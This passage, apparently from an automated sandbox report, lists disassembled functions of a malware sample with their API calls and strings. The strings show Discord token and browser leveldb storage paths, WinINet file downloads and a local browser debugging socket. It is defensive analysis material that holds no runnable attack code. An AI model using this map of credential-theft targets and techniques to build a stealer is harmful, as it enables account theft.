                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,-0000000C), ref: 0041566B
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00421509), ref: 00415679
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$AllocFileLocal$FreeGloballstrcpylstrlenmemset$AttributesCloseCreateFolderHandlePathReadSize
                                                                                                                                                                                                                                                                                • String ID: Local State$\discord\$dQw4w9WgXcQ
                                                                                                                                                                                                                                                                                • API String ID: 3817223191-2067953968
                                                                                                                                                                                                                                                                                • Opcode ID: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                • Instruction ID: 194099574810176e2e4ab308ae0ea84b9e6f71d167dd19124bd853461179d086
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 6f24543061e9ffb537914b6143e98d0867b4802166f338fab7a1659ffba852b0
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8EA17F71D007099BDB10EFB5CC85AEEB7B8FF48304F00455AF905A7152EB78AA85CBA5
                                                                                                                                                                                                                                                                                Function 0041D190 Relevance: 18.2, APIs: 12, Instructions: 179filetimeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • GetFileInformationByHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1A1
                                                                                                                                                                                                                                                                                • GetFileSize.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D1E5
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041D200
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041D21B
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041D224
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D235
                                                                                                                                                                                                                                                                                • SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041D254
                                                                                                                                                                                                                                                                                • ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041D265
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D2E6
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D305
                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041D321
                                                                                                                                                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0041D346
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$PointerReadUnothrow_t@std@@@__ehfuncinfo$??2@$Time$HandleInformationSizeSystem
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 3339682767-0
                                                                                                                                                                                                                                                                                • Opcode ID: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                • Instruction ID: 7dc5ab211660f74088cffd7409125a6117dcca4ff2d4ad636a370f5fe0998741
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a12afba9e78c32b077de29fc2bf2f4a56658124f83e00c1daa060bbe9636f390
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1051F1B1604705AFE3208F15CC91B6BB7E8FB84744F10492DF595AB290D778E881CB59
                                                                                                                                                                                                                                                                                Function 00415BF0 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\discord\,?,00000104,?,00000104,?,00000104,?,00000104), ref: 00415C48
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411550: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?), ref: 00411589
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,00000000,?,0000001A), ref: 00415C68
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415C7F
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415C8D
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Local Storage\leveldb\CURRENT), ref: 00415C99
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,?), ref: 00415CA3
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(?,\Local Storage\leveldb), ref: 00415CAF
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00411520: GetFileAttributesA.KERNEL32(00000000,?,?,?,0040B1C7,?,?,0000001C,0042150A), ref: 00411535
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: GetProcessHeap.KERNEL32 ref: 00415715
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: HeapAlloc.KERNEL32(00000000,00000000,0098967F), ref: 00415723
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: wsprintfA.USER32 ref: 00415739
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: FindFirstFileA.KERNEL32(?,?), ref: 0041574A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: strlen.MSVCRT ref: 004157D3
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: memcmp.MSVCRT(00000000,00000000,00000000,00000001), ref: 00415811
                                                                                                                                                                                                                                                                                  • Part of subcall function 00415700: strlen.MSVCRT ref: 0041586B
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: lstrcat$FileHeaplstrcpystrlen$AllocAttributesFindFirstFolderPathProcessmemcmpwsprintf
                                                                                                                                                                                                                                                                                • String ID: \Local Storage\leveldb$\Local Storage\leveldb\CURRENT$\discord\
                                                                                                                                                                                                                                                                                • API String ID: 1512132791-1179288657
                                                                                                                                                                                                                                                                                • Opcode ID: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                • Instruction ID: db52eabd1130b4015811ae594007c4c182e7f7f0e4775522e0b09ec713fe86e8
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9ea078b67b35388310b02698df7125a1bb4528359370f3218b3db1cc30c085d2
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D41A471900619ABC710EB719C86DEEB36CBF88348F40454AF64666052DB7CF6C58BA9
                                                                                                                                                                                                                                                                                Function 00404100 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 119networkfileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00410200: lstrcpyA.KERNEL32(00000000,?,?,?,?,004175C6,?), ref: 00410223
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,?,?,?,004042B3,00416A04,?,?,00416A04), ref: 004028AB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,00416A04,?,?,00416A04), ref: 004028BB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: ??_U@YAPAXI@Z.MSVCRT(00000400,?,00416A04,?,?,00416A04), ref: 004028CB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: lstrlenA.KERNEL32(00000000,?,?,00416A04,?,?,00416A04), ref: 004028EA
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402790: InternetCrackUrlA.WININET(00000000,00000000,00000000,?), ref: 004028FA
                                                                                                                                                                                                                                                                                • InternetOpenA.WININET ref: 00404151
                                                                                                                                                                                                                                                                                • StrCmpCA.SHLWAPI(?,https), ref: 00404165
                                                                                                                                                                                                                                                                                • InternetOpenUrlA.WININET(00000000,00000000,00000000,00000000,00000000,00000000), ref: 00404195
                                                                                                                                                                                                                                                                                • CreateFileA.KERNEL32 ref: 004041C9
                                                                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,-00000064), ref: 004041EB
                                                                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,-00000064,-00000044,00000000), ref: 00404205
                                                                                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000400), ref: 0040422A
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404231
                                                                                                                                                                                                                                                                                • InternetCloseHandle.WININET(-00000058), ref: 0040423A
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: Internet$CloseFileHandle$Open$CrackCreateReadWritelstrcpylstrlen
                                                                                                                                                                                                                                                                                • String ID: https
                                                                                                                                                                                                                                                                                • API String ID: 2507841554-1056335270
                                                                                                                                                                                                                                                                                • Opcode ID: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                • Instruction ID: e26aa42ddcce7a9dc6db16cb5d707b66fd772de428dd0f6f7d264c55934dbf87
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c147ca11e88c7ddc157469b44d7132012a04bd987f341dfb92f5734880947861
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9041E9719002199BDB10EFB0DD85BEE77B9EF84348F004029F901A7191DB78A98AC7E9
                                                                                                                                                                                                                                                                                Function 004110A0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 44memoryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004110B3
                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,00000008), ref: 004110BE
                                                                                                                                                                                                                                                                                • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004110C9
                                                                                                                                                                                                                                                                                • ReleaseDC.USER32(00000000,00000000), ref: 004110D4
                                                                                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(?,?,?,?,?,?,?,?,?,?,00417920,?,?,?,?), ref: 004110E0
                                                                                                                                                                                                                                                                                • HeapAlloc.KERNEL32(00000000,00000000,00000104,?,?,?,?,?,?,?,?,?,?,00417920,?,?), ref: 004110EE
                                                                                                                                                                                                                                                                                • wsprintfA.USER32 ref: 004110FA
                                                                                                                                                                                                                                                                                  • Part of subcall function 004101C0: lstrcpyA.KERNEL32(00000000,?,00000001,?,?,?,00417292,0042150A,?,?,?,?,00418606), ref: 004101E4
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000044D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000477000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000047C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000480000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004AD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004B5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004CE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004D7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000004DD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.000000000059F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.00000000005AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961335058.0000000000634000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1962333139.0000000000637000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_pjthjsdjgjrtavv.jbxd
                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: CapsDeviceHeap$AllocCreateProcessReleaselstrcpywsprintf
                                                                                                                                                                                                                                                                                • String ID: %dx%d$DISPLAY
                                                                                                                                                                                                                                                                                • API String ID: 3940144428-3048177138
                                                                                                                                                                                                                                                                                • Opcode ID: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                • Instruction ID: 594384e9460ea50e1c1a2799b2b5ef6833a83c8cc8fe28b05d57f5c36ffcb85d
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d4f6bdf6a8727250401686cbb5283f498457eeb982ee794fddf6dc554df9ea02
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F090713807047FF31027A5AC4EF2B7A5DEB84B56F110026BF06D72D2DAA56C1086F8
                                                                                                                                                                                                                                                                                Function 00406BC0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 115stringCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404EA0: InternetOpenA.WININET(?,?,?,?,00002407), ref: 00404ECB
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00404FDC
                                                                                                                                                                                                                                                                                  • Part of subcall function 00404EA0: memcpy.MSVCRT(00000000,00000000,?,00000000,http://localhost:,00000011), ref: 00405045
                                                                                                                                                                                                                                                                                • ??3@YAXPAX@Z.MSVCRT(?,?,00002407), ref: 00406F38
                                                                                                                                                                                                                                                                                  • Part of subcall function 00402400: memmove.MSVCRT(00000000,?,?,?,-00000001,77735E70,00000000,0040D14C,?,00000000), ref: 0040246E
                                                                                                                                                                                                                                                                                  • Part of subcall function 004053F0: strlen.MSVCRT ref: 00405409
                                                                                                                                                                                                                                                                                  • Part of subcall function 004053F0: memchr.MSVCRT ref: 00405456
                                                                                                                                                                                                                                                                                  • Part of subcall function 004053F0: memcmp.MSVCRT(00000000,?,00000000), ref: 0040546E
                                                                                                                                                                                                                                                                                  • Part of subcall function 0040ED20: memcpy.MSVCRT(00000000,?,0000000F,00000000,-00000001,77735E70,00000000,0040D171,00000000,00000002,000000FF,?,00000000), ref: 0040EDD8
                                                                                                                                                                                                                                                                                • memset.MSVCRT ref: 00406C44
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000009,ws://localhost:9223,00000009,?,00002407), ref: 00406C58
                                                                                                                                                                                                                                                                                • lstrcatA.KERNEL32(00000009,00000000), ref: 00406C65
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.1961215158.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961195294.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961240240.000000000041F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.1961273700.0000000000423000.00000008.00000001.01000000.00000003.sdmpDownload File
